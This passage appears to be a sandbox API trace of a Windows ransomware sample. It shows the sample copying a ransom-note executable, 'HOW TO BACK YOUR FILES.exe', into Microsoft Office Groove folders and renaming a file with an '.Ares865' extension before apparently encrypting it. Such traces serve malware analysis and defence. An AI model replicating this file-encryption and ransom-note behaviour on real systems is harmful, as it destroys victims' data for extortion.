dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.571] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.571] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.572] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck" [0071.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc840 | out: hHeap=0x2b0000) returned 1 [0071.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27a0 | out: hHeap=0x2b0000) returned 1 [0071.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck") returned 104 [0071.572] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck" [0071.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.572] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.586] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c2ad7c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c2ad7c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.587] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert" [0071.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4258 | out: hHeap=0x2b0000) returned 1 [0071.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2780 | out: hHeap=0x2b0000) returned 1 [0071.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert") returned 101 [0071.587] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert" [0071.587] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.587] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.591] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c2d3920, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c2d3920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.591] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.591] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.591] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow" [0071.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0071.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2760 | out: hHeap=0x2b0000) returned 1 [0071.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow") returned 107 [0071.592] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow" [0071.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.606] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.606] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c2f9a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c2f9a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.606] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.606] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.607] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange" [0071.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0071.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0071.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange") returned 107 [0071.607] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange" [0071.607] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.607] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.621] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.621] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c31fbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c31fbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.621] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.621] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.621] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay" [0071.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4180 | out: hHeap=0x2b0000) returned 1 [0071.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2720 | out: hHeap=0x2b0000) returned 1 [0071.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay") returned 101 [0071.621] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay" [0071.621] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.621] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.625] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c31fbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c31fbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.625] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.626] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.626] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue" [0071.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0071.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2700 | out: hHeap=0x2b0000) returned 1 [0071.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue") returned 103 [0071.626] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue" [0071.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.632] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.632] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528d0030, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c31fbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c31fbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.632] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.632] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.632] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana" [0071.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d98 | out: hHeap=0x2b0000) returned 1 [0071.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26e0 | out: hHeap=0x2b0000) returned 1 [0071.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana") returned 104 [0071.632] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana" [0071.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.640] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.640] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528d0030, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c345d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c345d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.640] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.640] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.640] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms" [0071.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e30b0 | out: hHeap=0x2b0000) returned 1 [0071.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26c0 | out: hHeap=0x2b0000) returned 1 [0071.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms") returned 81 [0071.641] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms" [0071.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.648] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.648] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c345d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c345d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.649] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.650] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.653] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml.Ares865") returned 113 [0071.653] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\grooveformsmetadata.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\grooveformsmetadata.xml.ares865"), dwFlags=0x1) returned 1 [0071.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\grooveformsmetadata.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0071.656] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=92113) returned 1 [0071.656] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0071.656] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0071.656] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.669] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0071.669] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0071.669] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.671] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates" [0071.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0071.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26e0 | out: hHeap=0x2b0000) returned 1 [0071.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates") returned 96 [0071.671] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates" [0071.671] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.671] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.683] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51d354f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c3b8160, 